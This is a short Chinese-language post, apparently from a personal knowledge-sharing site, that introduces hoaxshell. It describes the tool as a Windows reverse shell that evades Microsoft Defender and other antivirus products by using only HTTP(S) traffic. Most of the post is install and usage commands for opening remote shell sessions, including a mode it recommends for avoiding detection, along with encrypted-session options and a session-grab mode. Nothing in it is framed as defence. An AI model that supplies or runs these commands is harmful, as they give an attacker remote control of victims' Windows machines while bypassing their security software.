admin Windows反向shell -- hoaxshell
0x01 工具介绍
hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。
0x02 安装与使用
1、安装需要的库文件
git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py2、通过 http 的基本 shell 会话
sudo python3 hoaxshell.py -s your_ip
3、避免检测的推荐用法(通过 http)
sudo python3 hoaxshell.py -s your_ip -i -H 'Authorization'4、加密的 shell 会话 (https)
# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s your_ip -c /path/to/cert.pem -k path/to/key.pem
5、具有可信证书的加密 shell 会话
sudo python3 hoaxshell.py -s your.domain.com -t -c /path/to/cert.pem -k path/to/key.pem6、抓取会话模式
sudo python3 hoaxshell.py -s your_ip -g
0x03 下载地址
项目地址:https://github.com/t3l3machus/hoaxshell
如有侵权,请联系删除
本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
0条评论